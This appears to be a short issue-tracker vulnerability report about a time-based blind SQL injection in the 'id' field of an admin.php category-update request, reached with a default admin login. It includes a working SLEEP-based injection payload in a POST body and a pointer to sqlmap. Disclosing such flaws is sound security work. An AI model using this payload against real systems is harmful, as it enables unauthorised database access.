Open
Description
Log in to the background as the default account admin.

We click in order and grab packets:



There is a time-based blind SQL injection vulnerability in the location of id.


POC:
http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B
sqlmap:
Save the HTTP request package as a file .

Test using the SQLMap tool :

Metadata
Assignees
Labels
No labels